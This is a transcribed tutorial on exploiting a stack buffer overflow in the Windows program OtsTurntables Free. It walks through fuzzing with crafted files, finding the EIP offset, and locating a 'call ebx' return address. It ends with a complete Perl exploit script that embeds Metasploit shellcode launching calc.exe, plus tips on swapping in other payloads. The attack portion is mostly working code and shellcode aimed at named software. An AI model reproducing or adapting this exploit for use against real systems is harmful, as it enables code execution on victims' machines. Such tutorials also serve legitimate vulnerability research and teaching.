=> What's Stack Overflow? stack gets overflowed when too much memory is used for stack calling, resulting app crash, and this crash can be used!

Transcription

1 # Stack Overflow Exploitation, # # Real Life Example # Author : Darkb0x Home : Contact: Darkb0x97@googl .com --= Summary =-- 0x000 - NULL 0x001 - Introduction 0x010 - Finding The Bug 0x011 - Exploiting The Bug 0x100 - Writing an Exploit 0x101 - Downloads 0x110 - Conclusion Introduction : when a process attempts to store data more than what The result is that the extra data overwrites adjacent memory locations & this can cause memory overrite or corruption or even crash. and we call this bufferoverflow => What's Stack Overflow? stack gets overflowed when too much memory is used for stack calling, resulting app crash, and this crash can be used! Finding The Bug : In This Example am going to exploit this free software "OtsTurntables Free" This software is dealing with (.ots files), so lets try to fuzz it! :D lets start with 1000 "A" file & open it with this program!

2 1 - The regsiterswhere Our data were writen => will be the place of our shellcode // EBX 2 - EIP, its the adress that point on current registre => we can use it to point for our shellcode register in EBX 3 - The Stack! & its overtiten as well with Access Violation when executing [ ] => eip overiten & cannot go to this adress Now, we should try to findout the right number of "A" strings to overflow this software, lets try 800 "A",

3 still overiten with \x41, lets try 400 same old thing, lets try 300 the same! lets try 200 EIP not overiten in 200 "A", so its between 200 & 300 lets try 250 pretty nice, now we know its between 250 & 300 lets try 276

4 just a little bit more! lets try 280 bingo! now lets change last 4 "A" strings to "B" well done since 281 overite EIP to this mean we need only 281 char to overite the EIP Exploiting The Bug : now let's try to collect the informations about this overflow

5 1- As well as we see, the entred data are in EBX register, so our shellcode will be in EBX 2- Since entred data are in EBX, we will point our EIP to EBX [!] Structure of the Exploit : junkdata + nops + shellcode + neweip 1/ JUNKDATA => its the extra bytes to overflow the stack 2/ NOPS => needed always for shellcode even 1 byte! 3/ SHELLCODE => its the code that will execute a specific function (cmd exec / bindshell / dll & exec etc...) 4/ NEWEIP => Its the adress that will point on EBX register

6 The Size of overflow is 284 so lets split it as our structure up ^ : 4 bytes for new EIP 160 byte for exec command shellcode 20 byte for nops 97 byte for junkdata [!] Building : / I / Junk Data its going to be "\x41" x 97 / II / NOPS its going to be "\x90" x in hex = nop, mean do nothing / II / Shellcode (Exec CMD ) This ShellCode execute calc.exe "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61" "\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13" "\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f" "\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b" "\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30" "\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72" "\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd" "\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e" "\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52" "\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56"; Thanks Metasploit for the shellcode! you can generate your custom exec cmd shellcode from metasploit / III / NEW EIP The New EIP should point to EBX register, so we are going to search for adress that points on EBX 1 - Search From Olly :

7 write in the box that will come, jmp or call for ebx nothing for jmp ebx, but we found an adress for "call ebx"

8 "004015E4" => thats our return adress, we write it in reverse like that "\xe4\x15\x40\x00" 1 - Using FINDJMP : findjmp is a little tool made to search for jumps in windows modules uch as kernel32.dll for example findjump.exe kernel32.dll ebx

9 as you can see we found plenty adresses :) Writing an Exploit : we have now all the required infos to write an exploit, i prefer perl in writing #!/usr/bin/perl -w # Define Variables my $junk = "\x41" x 97; #junkdata my $nop = "\x90" x 20 ; # nops my $ret = "\xe4\x15\x40\x00" ; # New EIP # ShellCode, thanks metasploit my $shellcode =

10 "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61". "\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13". "\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f". "\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b". "\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30". "\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72". "\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd". "\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e". "\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52". "\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56"; my $exploit = "$junk.$nop.$shellcode.$ret"; #exploit structure my $file = "dark.ofl" ; #file name ## simple file handling open(my $FILE, ">$file") or die "Cannot open $file: $!"; print $FILE $exploit ; close($file); print "Done \n"; x101 - Downloads : OllyDBG FindJump OllyDBG 0x110 - Conclusion : Note : 1/The Software Used In The Tuto is OtsTurntables Free 2/This Bug alrady found by sun8hclf i just explained howto